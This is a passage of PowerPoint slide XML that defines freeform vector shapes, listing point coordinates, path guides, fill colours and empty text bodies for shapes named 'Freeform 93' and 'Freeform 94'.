                    <a:lnTo>
                      <a:pt x="44" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36361" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3054" y="3230"/>
                <a:ext cx="149" cy="157"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 83 w 149"/>
                  <a:gd name="T1" fmla="*/ 1 h 157"/>
                  <a:gd name="T2" fmla="*/ 85 w 149"/>
                  <a:gd name="T3" fmla="*/ 3 h 157"/>
                  <a:gd name="T4" fmla="*/ 87 w 149"/>
                  <a:gd name="T5" fmla="*/ 5 h 157"/>
                  <a:gd name="T6" fmla="*/ 91 w 149"/>
                  <a:gd name="T7" fmla="*/ 12 h 157"/>
                  <a:gd name="T8" fmla="*/ 97 w 149"/>
                  <a:gd name="T9" fmla="*/ 24 h 157"/>
                  <a:gd name="T10" fmla="*/ 103 w 149"/>
                  <a:gd name="T11" fmla="*/ 33 h 157"/>
                  <a:gd name="T12" fmla="*/ 111 w 149"/>
                  <a:gd name="T13" fmla="*/ 37 h 157"/>
                  <a:gd name="T14" fmla="*/ 116 w 149"/>
                  <a:gd name="T15" fmla="*/ 40 h 157"/>
                  <a:gd name="T16" fmla="*/ 116 w 149"/>
                  <a:gd name="T17" fmla="*/ 46 h 157"/>
                  <a:gd name="T18" fmla="*/ 123 w 149"/>
                  <a:gd name="T19" fmla="*/ 47 h 157"/>
                  <a:gd name="T20" fmla="*/ 124 w 149"/>
                  <a:gd name="T21" fmla="*/ 53 h 157"/>
                  <a:gd name="T22" fmla="*/ 129 w 149"/>
                  <a:gd name="T23" fmla="*/ 64 h 157"/>
                  <a:gd name="T24" fmla="*/ 138 w 149"/>
                  <a:gd name="T25" fmla="*/ 66 h 157"/>
                  <a:gd name="T26" fmla="*/ 145 w 149"/>
                  <a:gd name="T27" fmla="*/ 70 h 157"/>
                  <a:gd name="T28" fmla="*/ 149 w 149"/>
                  <a:gd name="T29" fmla="*/ 74 h 157"/>
                  <a:gd name="T30" fmla="*/ 144 w 149"/>
                  <a:gd name="T31" fmla="*/ 80 h 157"/>
                  <a:gd name="T32" fmla="*/ 135 w 149"/>
                  <a:gd name="T33" fmla="*/ 82 h 157"/>
                  <a:gd name="T34" fmla="*/ 128 w 149"/>
                  <a:gd name="T35" fmla="*/ 89 h 157"/>
                  <a:gd name="T36" fmla="*/ 121 w 149"/>
                  <a:gd name="T37" fmla="*/ 96 h 157"/>
                  <a:gd name="T38" fmla="*/ 113 w 149"/>
                  <a:gd name="T39" fmla="*/ 101 h 157"/>
                  <a:gd name="T40" fmla="*/ 111 w 149"/>
                  <a:gd name="T41" fmla="*/ 111 h 157"/>
                  <a:gd name="T42" fmla="*/ 104 w 149"/>
                  <a:gd name="T43" fmla="*/ 116 h 157"/>
                  <a:gd name="T44" fmla="*/ 95 w 149"/>
                  <a:gd name="T45" fmla="*/ 120 h 157"/>
                  <a:gd name="T46" fmla="*/ 91 w 149"/>
                  <a:gd name="T47" fmla="*/ 134 h 157"/>
                  <a:gd name="T48" fmla="*/ 88 w 149"/>
                  <a:gd name="T49" fmla="*/ 137 h 157"/>
                  <a:gd name="T50" fmla="*/ 81 w 149"/>
                  <a:gd name="T51" fmla="*/ 138 h 157"/>
                  <a:gd name="T52" fmla="*/ 73 w 149"/>
                  <a:gd name="T53" fmla="*/ 138 h 157"/>
                  <a:gd name="T54" fmla="*/ 62 w 149"/>
                  <a:gd name="T55" fmla="*/ 134 h 157"/>
                  <a:gd name="T56" fmla="*/ 52 w 149"/>
                  <a:gd name="T57" fmla="*/ 129 h 157"/>
                  <a:gd name="T58" fmla="*/ 49 w 149"/>
                  <a:gd name="T59" fmla="*/ 132 h 157"/>
                  <a:gd name="T60" fmla="*/ 42 w 149"/>
                  <a:gd name="T61" fmla="*/ 145 h 157"/>
                  <a:gd name="T62" fmla="*/ 32 w 149"/>
                  <a:gd name="T63" fmla="*/ 153 h 157"/>
                  <a:gd name="T64" fmla="*/ 21 w 149"/>
                  <a:gd name="T65" fmla="*/ 157 h 157"/>
                  <a:gd name="T66" fmla="*/ 12 w 149"/>
                  <a:gd name="T67" fmla="*/ 156 h 157"/>
                  <a:gd name="T68" fmla="*/ 11 w 149"/>
                  <a:gd name="T69" fmla="*/ 151 h 157"/>
                  <a:gd name="T70" fmla="*/ 14 w 149"/>
                  <a:gd name="T71" fmla="*/ 142 h 157"/>
                  <a:gd name="T72" fmla="*/ 9 w 149"/>
                  <a:gd name="T73" fmla="*/ 128 h 157"/>
                  <a:gd name="T74" fmla="*/ 0 w 149"/>
                  <a:gd name="T75" fmla="*/ 122 h 157"/>
                  <a:gd name="T76" fmla="*/ 0 w 149"/>
                  <a:gd name="T77" fmla="*/ 103 h 157"/>
                  <a:gd name="T78" fmla="*/ 0 w 149"/>
                  <a:gd name="T79" fmla="*/ 73 h 157"/>
                  <a:gd name="T80" fmla="*/ 13 w 149"/>
                  <a:gd name="T81" fmla="*/ 72 h 157"/>
                  <a:gd name="T82" fmla="*/ 17 w 149"/>
                  <a:gd name="T83" fmla="*/ 45 h 157"/>
                  <a:gd name="T84" fmla="*/ 17 w 149"/>
                  <a:gd name="T85" fmla="*/ 29 h 157"/>
                  <a:gd name="T86" fmla="*/ 17 w 149"/>
                  <a:gd name="T87" fmla="*/ 10 h 157"/>
                  <a:gd name="T88" fmla="*/ 47 w 149"/>
                  <a:gd name="T89" fmla="*/ 6 h 157"/>
                  <a:gd name="T90" fmla="*/ 59 w 149"/>
                  <a:gd name="T91" fmla="*/ 11 h 157"/>
                  <a:gd name="T92" fmla="*/ 68 w 149"/>
                  <a:gd name="T93" fmla="*/ 4 h 157"/>
                  <a:gd name="T94" fmla="*/ 76 w 149"/>
                  <a:gd name="T95" fmla="*/ 3 h 157"/>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49"/>
                  <a:gd name="T145" fmla="*/ 0 h 157"/>
                  <a:gd name="T146" fmla="*/ 149 w 149"/>
                  <a:gd name="T147" fmla="*/ 157 h 157"/>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49" h="157">
                    <a:moveTo>
                      <a:pt x="82" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="83" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36362" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3839" y="2183"/>
                <a:ext cx="174" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 174"/>
                  <a:gd name="T1" fmla="*/ 63 h 84"/>
                  <a:gd name="T2" fmla="*/ 36 w 174"/>
                  <a:gd name="T3" fmla="*/ 63 h 84"/>
                  <a:gd name="T4" fmla="*/ 41 w 174"/>
                  <a:gd name="T5" fmla="*/ 63 h 84"/>
                  <a:gd name="T6" fmla="*/ 47 w 174"/>
                  <a:gd name="T7" fmla="*/ 59 h 84"/>
                  <a:gd name="T8" fmla="*/ 51 w 174"/>
                  <a:gd name="T9" fmla="*/ 57 h 84"/>
                  <a:gd name="T10" fmla="*/ 56 w 174"/>
                  <a:gd name="T11" fmla="*/ 57 h 84"/>
                  <a:gd name="T12" fmla="*/ 62 w 174"/>
                  <a:gd name="T13" fmla="*/ 52 h 84"/>
                  <a:gd name="T14" fmla="*/ 54 w 174"/>
                  <a:gd name="T15" fmla="*/ 50 h 84"/>
                  <a:gd name="T16" fmla="*/ 47 w 174"/>
                  <a:gd name="T17" fmla="*/ 47 h 84"/>
                  <a:gd name="T18" fmla="*/ 46 w 174"/>
                  <a:gd name="T19" fmla="*/ 44 h 84"/>
                  <a:gd name="T20" fmla="*/ 41 w 174"/>
                  <a:gd name="T21" fmla="*/ 39 h 84"/>
                  <a:gd name="T22" fmla="*/ 38 w 174"/>
                  <a:gd name="T23" fmla="*/ 39 h 84"/>
                  <a:gd name="T24" fmla="*/ 35 w 174"/>
                  <a:gd name="T25" fmla="*/ 44 h 84"/>
                  <a:gd name="T26" fmla="*/ 25 w 174"/>
                  <a:gd name="T27" fmla="*/ 41 h 84"/>
                  <a:gd name="T28" fmla="*/ 20 w 174"/>
                  <a:gd name="T29" fmla="*/ 39 h 84"/>
                  <a:gd name="T30" fmla="*/ 15 w 174"/>
                  <a:gd name="T31" fmla="*/ 36 h 84"/>
                  <a:gd name="T32" fmla="*/ 20 w 174"/>
                  <a:gd name="T33" fmla="*/ 31 h 84"/>
                  <a:gd name="T34" fmla="*/ 25 w 174"/>
                  <a:gd name="T35" fmla="*/ 28 h 84"/>
                  <a:gd name="T36" fmla="*/ 30 w 174"/>
                  <a:gd name="T37" fmla="*/ 24 h 84"/>
                  <a:gd name="T38" fmla="*/ 27 w 174"/>
                  <a:gd name="T39" fmla="*/ 21 h 84"/>
                  <a:gd name="T40" fmla="*/ 32 w 174"/>
                  <a:gd name="T41" fmla="*/ 11 h 84"/>
                  <a:gd name="T42" fmla="*/ 48 w 174"/>
                  <a:gd name="T43" fmla="*/ 10 h 84"/>
                  <a:gd name="T44" fmla="*/ 65 w 174"/>
                  <a:gd name="T45" fmla="*/ 15 h 84"/>
                  <a:gd name="T46" fmla="*/ 69 w 174"/>
                  <a:gd name="T47" fmla="*/ 5 h 84"/>
                  <a:gd name="T48" fmla="*/ 82 w 174"/>
                  <a:gd name="T49" fmla="*/ 1 h 84"/>
                  <a:gd name="T50" fmla="*/ 99 w 174"/>
                  <a:gd name="T51" fmla="*/ 8 h 84"/>
                  <a:gd name="T52" fmla="*/ 112 w 174"/>
                  <a:gd name="T53" fmla="*/ 6 h 84"/>
                  <a:gd name="T54" fmla="*/ 128 w 174"/>
                  <a:gd name="T55" fmla="*/ 7 h 84"/>
                  <a:gd name="T56" fmla="*/ 147 w 174"/>
                  <a:gd name="T57" fmla="*/ 7 h 84"/>
                  <a:gd name="T58" fmla="*/ 159 w 174"/>
                  <a:gd name="T59" fmla="*/ 13 h 84"/>
                  <a:gd name="T60" fmla="*/ 167 w 174"/>
                  <a:gd name="T61" fmla="*/ 17 h 84"/>
                  <a:gd name="T62" fmla="*/ 174 w 174"/>
                  <a:gd name="T63" fmla="*/ 23 h 84"/>
                  <a:gd name="T64" fmla="*/ 164 w 174"/>
                  <a:gd name="T65" fmla="*/ 28 h 84"/>
                  <a:gd name="T66" fmla="*/ 149 w 174"/>
                  <a:gd name="T67" fmla="*/ 36 h 84"/>
                  <a:gd name="T68" fmla="*/ 136 w 174"/>
                  <a:gd name="T69" fmla="*/ 47 h 84"/>
                  <a:gd name="T70" fmla="*/ 122 w 174"/>
                  <a:gd name="T71" fmla="*/ 45 h 84"/>
                  <a:gd name="T72" fmla="*/ 114 w 174"/>
                  <a:gd name="T73" fmla="*/ 59 h 84"/>
                  <a:gd name="T74" fmla="*/ 101 w 174"/>
                  <a:gd name="T75" fmla="*/ 61 h 84"/>
                  <a:gd name="T76" fmla="*/ 97 w 174"/>
                  <a:gd name="T77" fmla="*/ 56 h 84"/>
                  <a:gd name="T78" fmla="*/ 73 w 174"/>
                  <a:gd name="T79" fmla="*/ 71 h 84"/>
                  <a:gd name="T80" fmla="*/ 69 w 174"/>
                  <a:gd name="T81" fmla="*/ 79 h 84"/>
                  <a:gd name="T82" fmla="*/ 60 w 174"/>
                  <a:gd name="T83" fmla="*/ 81 h 84"/>
                  <a:gd name="T84" fmla="*/ 48 w 174"/>
                  <a:gd name="T85" fmla="*/ 84 h 84"/>
                  <a:gd name="T86" fmla="*/ 43 w 174"/>
                  <a:gd name="T87" fmla="*/ 81 h 84"/>
                  <a:gd name="T88" fmla="*/ 40 w 174"/>
                  <a:gd name="T89" fmla="*/ 79 h 84"/>
                  <a:gd name="T90" fmla="*/ 36 w 174"/>
                  <a:gd name="T91" fmla="*/ 77 h 84"/>
                  <a:gd name="T92" fmla="*/ 29 w 174"/>
                  <a:gd name="T93" fmla="*/ 78 h 84"/>
                  <a:gd name="T94" fmla="*/ 25 w 174"/>
                  <a:gd name="T95" fmla="*/ 80 h 84"/>
                  <a:gd name="T96" fmla="*/ 20 w 174"/>
                  <a:gd name="T97" fmla="*/ 76 h 84"/>
                  <a:gd name="T98" fmla="*/ 11 w 174"/>
                  <a:gd name="T99" fmla="*/ 77 h 84"/>
                  <a:gd name="T100" fmla="*/ 1 w 174"/>
                  <a:gd name="T101" fmla="*/ 77 h 84"/>
                  <a:gd name="T102" fmla="*/ 1 w 174"/>
                  <a:gd name="T103" fmla="*/ 71 h 84"/>
                  <a:gd name="T104" fmla="*/ 5 w 174"/>
                  <a:gd name="T105" fmla="*/ 70 h 84"/>
                  <a:gd name="T106" fmla="*/ 6 w 174"/>
                  <a:gd name="T107" fmla="*/ 66 h 84"/>
                  <a:gd name="T108" fmla="*/ 20 w 174"/>
                  <a:gd name="T109" fmla="*/ 67 h 84"/>
                  <a:gd name="T110" fmla="*/ 22 w 174"/>
                  <a:gd name="T111" fmla="*/ 66 h 84"/>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174"/>
                  <a:gd name="T169" fmla="*/ 0 h 84"/>
                  <a:gd name="T170" fmla="*/ 174 w 174"/>
                  <a:gd name="T171" fmla="*/ 84 h 84"/>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174" h="84">
                    <a:moveTo>
                      <a:pt x="28" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="11"/>
                    </a:lnTo>
